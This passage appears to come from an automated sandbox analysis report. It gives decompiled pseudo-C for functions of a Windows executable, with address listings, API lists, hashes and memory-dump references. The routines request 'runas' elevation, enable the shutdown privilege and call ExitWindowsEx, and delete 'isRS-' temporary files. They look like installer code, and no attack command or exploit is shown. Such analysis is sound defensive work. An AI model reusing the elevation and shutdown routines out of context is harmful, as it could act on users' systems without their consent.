				_t75 = _t74 + 0xffffffb8;
				_v8 = 0;
				_v12 = 0;
				_v16 = __ecx;
				_t71 = __edx;
				_t60 = __eax;
				_push(_t73);
				_push(0x6a6237);
				 *[fs:eax] = _t75;
				E006A5F04(__eax,  &_v8,  *[fs:eax]);
				E006A6014( &_v12, _t60, _t71);
				E00407760( &_v76, 0x3c);
				_v76.cbSize = 0x3c;
				_v76.fMask = 0x800540;
				_v76.lpVerb = L"runas";
				_v76.lpFile = E0040B278(_v8);
				_v76.lpParameters = E0040B278(_t71);
				_v76.lpDirectory = E0040B278(_v12);
				_v76.nShow = 1;
				if(ShellExecuteExW( &_v76) == 0) {
					if(GetLastError() == 0x4c7) {
						E00428FDC();
					}
					E0060CE84(L"ShellExecuteEx");
				}
				if(_v76.hProcess == 0) {
					E0060CD28(L"ShellExecuteEx returned hProcess=0", _t60);
				}
				_push(_t73);
				_push(0x6a6215);
				_push( *[fs:edx]);
				 *[fs:edx] = _t75;
				do {
					E006A5C10();
					_t41 = MsgWaitForMultipleObjects(1,  &(_v76.hProcess), 0, 0xffffffff, 0x4ff);
				} while (_t41 == 1);
				if(_t41 == 0xffffffff) {
					E0060CE84(L"MsgWaitForMultipleObjects");
				}
				E006A5C10();
				if(GetExitCodeProcess(_v76.hProcess, _v16) == 0) {
					E0060CE84(L"GetExitCodeProcess");
				}
				_pop(_t69);
				 *[fs:eax] = _t69;
				_push(E006A621C);
				return CloseHandle(_v76.hProcess);
			}













                                                                    0x006a60e9
                                                                    0x006a60eb
                                                                    0x006a60f2
                                                                    0x006a60f5
                                                                    0x006a60f8
                                                                    0x006a60fb
                                                                    0x006a60fd
                                                                    0x006a6101
                                                                    0x006a6102
                                                                    0x006a610a
                                                                    0x006a6112
                                                                    0x006a611a
                                                                    0x006a6129
                                                                    0x006a612e
                                                                    0x006a6135
                                                                    0x006a6141
                                                                    0x006a614c
                                                                    0x006a6156
                                                                    0x006a6161
                                                                    0x006a6164
                                                                    0x006a6176
                                                                    0x006a6182
                                                                    0x006a6184
                                                                    0x006a6184
                                                                    0x006a618e
                                                                    0x006a618e
                                                                    0x006a6197
                                                                    0x006a619e
                                                                    0x006a619e
                                                                    0x006a61a5
                                                                    0x006a61a6
                                                                    0x006a61ab
                                                                    0x006a61ae
                                                                    0x006a61b1
                                                                    0x006a61b1
                                                                    0x006a61c5
                                                                    0x006a61ca
                                                                    0x006a61d2
                                                                    0x006a61d9
                                                                    0x006a61d9
                                                                    0x006a61de
                                                                    0x006a61f2
                                                                    0x006a61f9
                                                                    0x006a61f9
                                                                    0x006a6200
                                                                    0x006a6203
                                                                    0x006a6206
                                                                    0x006a6214

                                                                    APIs
                                                                      • Part of subcall function 006A5F04: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                                      • Part of subcall function 006A5F04: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                                      • Part of subcall function 006A5F04: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                                      • Part of subcall function 006A5F04: CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                                      • Part of subcall function 006A6014: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A60A5,?,00000097,00000000,?,006A611F,00000000,006A6237,?,?,00000001), ref: 006A6043
                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 006A616F
                                                                    • GetLastError.KERNEL32(00000000,006A6237,?,?,00000001), ref: 006A6178
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006A61C5
                                                                    • GetExitCodeProcess.KERNEL32 ref: 006A61EB
                                                                    • CloseHandle.KERNEL32(00000000,006A621C,00000000,00000000,000000FF,000004FF,00000000,006A6215,?,00000000,006A6237,?,?,00000001), ref: 006A620F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                                    • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                    • API String ID: 254331816-221126205
                                                                    • Opcode ID: c2adbbc871acc4843ce61d2285dfbb2c69ebc7a97822930896cce5b608feca68
                                                                    • Instruction ID: 3b593d6e4f6188ec2893085c4d8bc70e2010c955c7988aee54b7ca20d83eebf0
                                                                    • Opcode Fuzzy Hash: c2adbbc871acc4843ce61d2285dfbb2c69ebc7a97822930896cce5b608feca68
                                                                    • Instruction Fuzzy Hash: 4931AF70A00208AFDB10FFE9C842A9DBABAEF06314F44053DF514E62D2D7789E448F29
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E0D4, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E0040E0D4(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040E0B0(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040E0B0(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040DAF8( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040E0B0(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E0040DAF8(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040DAF8( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040DAF8(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040DAF8(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}






















                                                                    0x0040e0e0
                                                                    0x0040e0e3
                                                                    0x0040e0e9
                                                                    0x0040e0f6
                                                                    0x0040e0fa
                                                                    0x0040e139
                                                                    0x0040e140
                                                                    0x0040e180
                                                                    0x00000000
                                                                    0x0040e142
                                                                    0x0040e14a
                                                                    0x0040e15b
                                                                    0x0040e161
                                                                    0x0040e167
                                                                    0x0040e16f
                                                                    0x0040e175
                                                                    0x0040e183
                                                                    0x0040e185
                                                                    0x0040e188
                                                                    0x0040e18a
                                                                    0x0040e18c
                                                                    0x0040e18c
                                                                    0x0040e18f
                                                                    0x0040e197
                                                                    0x0040e1a8
                                                                    0x0040e26f
                                                                    0x0040e1ba
                                                                    0x0040e1be
                                                                    0x0040e1c0
                                                                    0x0040e1c2
                                                                    0x0040e1c4
                                                                    0x0040e1c4
                                                                    0x0040e1cf
                                                                    0x0040e1df
                                                                    0x0040e1e3
                                                                    0x0040e1e5
                                                                    0x0040e1e7
                                                                    0x0040e1e9
                                                                    0x0040e1e9
                                                                    0x0040e1ef
                                                                    0x0040e207
                                                                    0x0040e20e
                                                                    0x0040e214
                                                                    0x0040e230
                                                                    0x0040e232
                                                                    0x0040e259
                                                                    0x0040e26b
                                                                    0x0040e26d
                                                                    0x00000000
                                                                    0x0040e26d
                                                                    0x0040e230
                                                                    0x0040e20e
                                                                    0x00000000
                                                                    0x0040e1cf
                                                                    0x0040e285
                                                                    0x0040e285
                                                                    0x0040e197
                                                                    0x0040e175
                                                                    0x0040e161
                                                                    0x0040e14a
                                                                    0x0040e0fc
                                                                    0x0040e107
                                                                    0x0040e10b
                                                                    0x00000000
                                                                    0x0040e10d
                                                                    0x0040e10d
                                                                    0x0040e118
                                                                    0x0040e11c
                                                                    0x0040e121
                                                                    0x00000000
                                                                    0x0040e123
                                                                    0x0040e12f
                                                                    0x0040e12f
                                                                    0x0040e121
                                                                    0x0040e10b
                                                                    0x0040e28a
                                                                    0x0040e293

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,0041CF90,?,?), ref: 0040E0F1
                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF90,?,?), ref: 0040E202
                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E214
                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E220
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E265
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                    • API String ID: 1930782624-3908791685
                                                                    • Opcode ID: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                                    • Instruction ID: 85f15f90104044dde56611b048d4fe37091be9da2e2d426f5e1dee482ffdf80d
                                                                    • Opcode Fuzzy Hash: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                                    • Instruction Fuzzy Hash: 09418471E005189BCB10DAA6CC85ADEB3B9EF44310F1449FAD504F72C1EB789E568F89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060F6D8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E0060F6D8() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E00429D18() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}







                                                                    0x0060f6e3
                                                                    0x0060f740
                                                                    0x0060f744
                                                                    0x0060f74c
                                                                    0x00000000
                                                                    0x0060f74e
                                                                    0x0060f6f5
                                                                    0x0060f707
                                                                    0x0060f70c
                                                                    0x0060f714
                                                                    0x0060f72e
                                                                    0x0060f73a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0060f73c
                                                                    0x00000000

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0060F707
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F72E
                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F733
                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 0060F744
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 107509674-3733053543
                                                                    • Opcode ID: db782202178d27a3b7ec1b4d3af323313e6a5951352ddb141a95d71b7c8baf5b
                                                                    • Instruction ID: 06ed2f01938c74524bf5f5b14376f39d724559be6214a1270456cb597724f4e2
                                                                    • Opcode Fuzzy Hash: db782202178d27a3b7ec1b4d3af323313e6a5951352ddb141a95d71b7c8baf5b
                                                                    • Instruction Fuzzy Hash: 8EF090306E430276E624AF719C47FEB218D9B40B09F50092DF644D61C1DBA9E589826B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006A68B0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 74%
                                                                    			E006A68B0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, short* _a8, intOrPtr _a12, void* _a16, char _a20, intOrPtr _a24, intOrPtr* _a32, intOrPtr _a36, intOrPtr* _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				char _v5;
				intOrPtr _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v60;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed int _t77;
				signed int _t78;
				intOrPtr* _t79;
				signed int _t82;
				signed int _t83;
				short* _t87;
				intOrPtr _t106;
				intOrPtr _t123;
				void* _t125;
				char _t126;
				intOrPtr* _t127;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr* _t148;
				void* _t150;
				void* _t151;
				intOrPtr _t152;
				intOrPtr _t164;

				_t150 = _t151;
				_t152 = _t151 + 0xffffff8c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t147 = __ecx;
				_t123 = __edx;
				_t145 = __eax;
				_push(_t150);
				_push(0x6a6acd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t152;
				if( *0x6d648c == 0) {
					_v5 = 0;
					__eflags = 0;
					_pop(_t136);
					 *[fs:eax] = _t136;
					_push(E006A6AD4);
					return 0;
				} else {
					E00407760( &_v120, 0x60);
					_v120 = 0x60;
					if(_a20 != 0) {
						_v108 = _v108 | 0x00002000;
					}
					_v112 =  *0x6d2634;
					_t70 =  *0x6cdec4; // 0x6d579c
					if(IsIconic( *( *_t70 + 0x188)) == 0) {
						_t74 =  *0x6cdec4; // 0x6d579c
						_t77 = GetWindowLongW( *( *_t74 + 0x188), 0xfffffff0);
						__eflags = _t77 & 0x10000000;
						_t12 = (_t77 & 0x10000000) == 0;
						__eflags = _t12;
						_t78 = _t77 & 0xffffff00 | _t12;
					} else {
						_t78 = 1;
					}
					if(_t78 == 0) {
						_t79 =  *0x6cdec4; // 0x6d579c
						_t82 = GetWindowLongW( *( *_t79 + 0x188), 0xffffffec);
						__eflags = _t82 & 0x00000080;
						_t17 = (_t82 & 0x00000080) != 0;
						__eflags = _t17;
						_t83 = _t82 & 0xffffff00 | _t17;
					} else {
						_t83 = 1;
					}
					if(_t83 == 0) {
						_v116 = _t145;
					} else {
						_v116 = 0;
					}
					_v104 = _a44;
					_v100 = _a52;
					_v96 = _a48;
					_v92 = _t123;
					_v88 = _t147;
					_t87 = _a8;
					if(_t87 != 0 &&  *_t87 != 0) {
						_v60 = _a8;
					}
					if(_a24 != 0) {
						_v36 = 0x6a6888;
						_v32 = _a24;
					}
					_v12 = 0;
					_push(_t150);
					_push(0x6a6ab4);
					_push( *[fs:edx]);
					 *[fs:edx] = _t152;
					_t125 = _a36 + 1;
					if(_t125 != 0) {
						_t106 =  *0x54808c; // 0x5480e4
						_v12 = E00466A64(0, 1, _t145, _t106);
						_v108 = _v108 | 0x00000010;
						_t125 = _t125 - 1;
						if(_t125 >= 0) {
							_t126 = _t125 + 1;
							_t164 = _t126;
							_v24 = _t126;
							_t127 = _a40;
							_t148 = _a32;
							do {
								_t145 = E0054BA48(_v12);
								E0054B708(_t145,  *_t127, _t164);
								 *((intOrPtr*)(_t145 + 0x18)) =  *_t148;
								_t148 = _t148 + 4;
								_t127 = _t127 + 4;
								_t45 =  &_v24;
								 *_t45 = _v24 - 1;
							} while ( *_t45 != 0);
						}
						_v80 = E0054BA54(_v12);
						_v84 =  *((intOrPtr*)( *((intOrPtr*)(_v12 + 8)) + 8));
					}
					E005C9060();
					_v16 = GetActiveWindow();
					_v20 = E005ABB4C(0, _t125, _t145, _t147);
					 *[fs:eax] = _t152;
					_v5 =  *0x6d648c( &_v120, _a12, 0, _a4,  *[fs:eax], 0x6a6a97, _t150) == 0;
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(E006A6A9E);
					E005ABC0C(_v20);
					SetActiveWindow(_v16);
					return E005C9060();
				}
			}












































                                                                    0x006a68b1
                                                                    0x006a68b3
                                                                    0x006a68b6
                                                                    0x006a68b7
                                                                    0x006a68b8
                                                                    0x006a68b9
                                                                    0x006a68bb
                                                                    0x006a68bd
                                                                    0x006a68c1
                                                                    0x006a68c2
                                                                    0x006a68c7
                                                                    0x006a68ca
                                                                    0x006a68d4
                                                                    0x006a6abb
                                                                    0x006a6abf
                                                                    0x006a6ac1
                                                                    0x006a6ac4
                                                                    0x006a6ac7
                                                                    0x006a6acc
                                                                    0x006a68da
                                                                    0x006a68e4
                                                                    0x006a68e9
                                                                    0x006a68f4
                                                                    0x006a68f6
                                                                    0x006a68f6
                                                                    0x006a6902
                                                                    0x006a6905
                                                                    0x006a691a
                                                                    0x006a6920
                                                                    0x006a6930
                                                                    0x006a6935
                                                                    0x006a693a
                                                                    0x006a693a
                                                                    0x006a693a
                                                                    0x006a691c
                                                                    0x006a691c
                                                                    0x006a691c
                                                                    0x006a693f
                                                                    0x006a6945
                                                                    0x006a6955
                                                                    0x006a695a
                                                                    0x006a695c
                                                                    0x006a695c
                                                                    0x006a695c
                                                                    0x006a6941
                                                                    0x006a6941
                                                                    0x006a6941
                                                                    0x006a6961
                                                                    0x006a696a
                                                                    0x006a6963
                                                                    0x006a6965
                                                                    0x006a6965
                                                                    0x006a6970
                                                                    0x006a6976
                                                                    0x006a697c
                                                                    0x006a697f
                                                                    0x006a6982
                                                                    0x006a6985
                                                                    0x006a698a
                                                                    0x006a6995
                                                                    0x006a6995
                                                                    0x006a699c
                                                                    0x006a699e
                                                                    0x006a69a8
                                                                    0x006a69a8
                                                                    0x006a69ad
                                                                    0x006a69b2
                                                                    0x006a69b3
                                                                    0x006a69b8
                                                                    0x006a69bb
                                                                    0x006a69c1
                                                                    0x006a69c4
                                                                    0x006a69c6
                                                                    0x006a69da
                                                                    0x006a69dd
                                                                    0x006a69e1
                                                                    0x006a69e4
                                                                    0x006a69e6
                                                                    0x006a69e6
                                                                    0x006a69e7
                                                                    0x006a69ea
                                                                    0x006a69ed
                                                                    0x006a69f0
                                                                    0x006a69f8
                                                                    0x006a69fe
                                                                    0x006a6a05
                                                                    0x006a6a08
                                                                    0x006a6a0b
                                                                    0x006a6a0e
                                                                    0x006a6a0e
                                                                    0x006a6a0e
                                                                    0x006a69f0
                                                                    0x006a6a1b
                                                                    0x006a6a27
                                                                    0x006a6a27
                                                                    0x006a6a2f
                                                                    0x006a6a39
                                                                    0x006a6a43
                                                                    0x006a6a51
                                                                    0x006a6a6a
                                                                    0x006a6a70
                                                                    0x006a6a73
                                                                    0x006a6a76
                                                                    0x006a6a7e
                                                                    0x006a6a87
                                                                    0x006a6a96
                                                                    0x006a6a96

                                                                    APIs
                                                                    • IsIconic.USER32(?), ref: 006A6913
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006A6930
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006A6955
                                                                      • Part of subcall function 005ABC0C: IsWindow.USER32(8B565300), ref: 005ABC1A
                                                                      • Part of subcall function 005ABC0C: EnableWindow.USER32(8B565300,000000FF), ref: 005ABC29
                                                                    • GetActiveWindow.USER32 ref: 006A6A34
                                                                    • SetActiveWindow.USER32(00000005,006A6A9E,006A6AB4,?,?,000000EC,?,000000F0,00000000,006A6ACD,?,00000000,?,00000000), ref: 006A6A87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$ActiveLong$EnableIconic
                                                                    • String ID: `
                                                                    • API String ID: 4222481217-2679148245
                                                                    • Opcode ID: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
                                                                    • Instruction ID: 936cf99dd23b6ce25ef8ab77046748165037aff960be166beb91cb3f54ae6a19
                                                                    • Opcode Fuzzy Hash: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
                                                                    • Instruction Fuzzy Hash: C3611875A002099FDB00EFA9C885A9EBBF6FB4A304F598469F914EB361D734AD41CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B8DE4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E006B8DE4(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				struct _WIN32_FIND_DATAW _v604;
				char _v608;
				char _v612;
				void* _t59;
				intOrPtr _t70;
				intOrPtr _t73;
				signed int _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t82;

				_t80 = _t81;
				_t82 = _t81 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v8 = 0;
				_t59 = __eax;
				_push(_t80);
				_push(0x6b8f21);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				E0040B4C8( &_v608, L"isRS-???.tmp", __eax);
				_v12 = FindFirstFileW(E0040B278(_v608),  &_v604);
				if(_v12 == 0xffffffff) {
					_pop(_t70);
					 *[fs:eax] = _t70;
					_push(E006B8F28);
					E0040A228( &_v612, 2);
					return E0040A1C8( &_v8);
				} else {
					_push(_t80);
					_push(0x6b8ef4);
					_push( *[fs:eax]);
					 *[fs:eax] = _t82;
					do {
						if(E004241A0( &(_v604.cFileName), 5, L"isRS-") == 0 && (_v604.dwFileAttributes & 0x00000010) == 0) {
							E0040B318( &_v612, 0x104,  &(_v604.cFileName));
							E0040B4C8( &_v8, _v612, _t59);
							_t77 = _v604.dwFileAttributes;
							if((_t77 & 0x00000001) != 0) {
								SetFileAttributesW(E0040B278(_v8), _t77 & 0xfffffffe);
							}
							E00423A20(_v8);
						}
					} while (FindNextFileW(_v12,  &_v604) != 0);
					_pop(_t73);
					 *[fs:eax] = _t73;
					_push(E006B8EFB);
					return FindClose(_v12);
				}
			}















                                                                    0x006b8de5
                                                                    0x006b8de7
                                                                    0x006b8df1
                                                                    0x006b8df7
                                                                    0x006b8dfd
                                                                    0x006b8e00
                                                                    0x006b8e04
                                                                    0x006b8e05
                                                                    0x006b8e0a
                                                                    0x006b8e0d
                                                                    0x006b8e24
                                                                    0x006b8e3a
                                                                    0x006b8e41
                                                                    0x006b8efd
                                                                    0x006b8f00
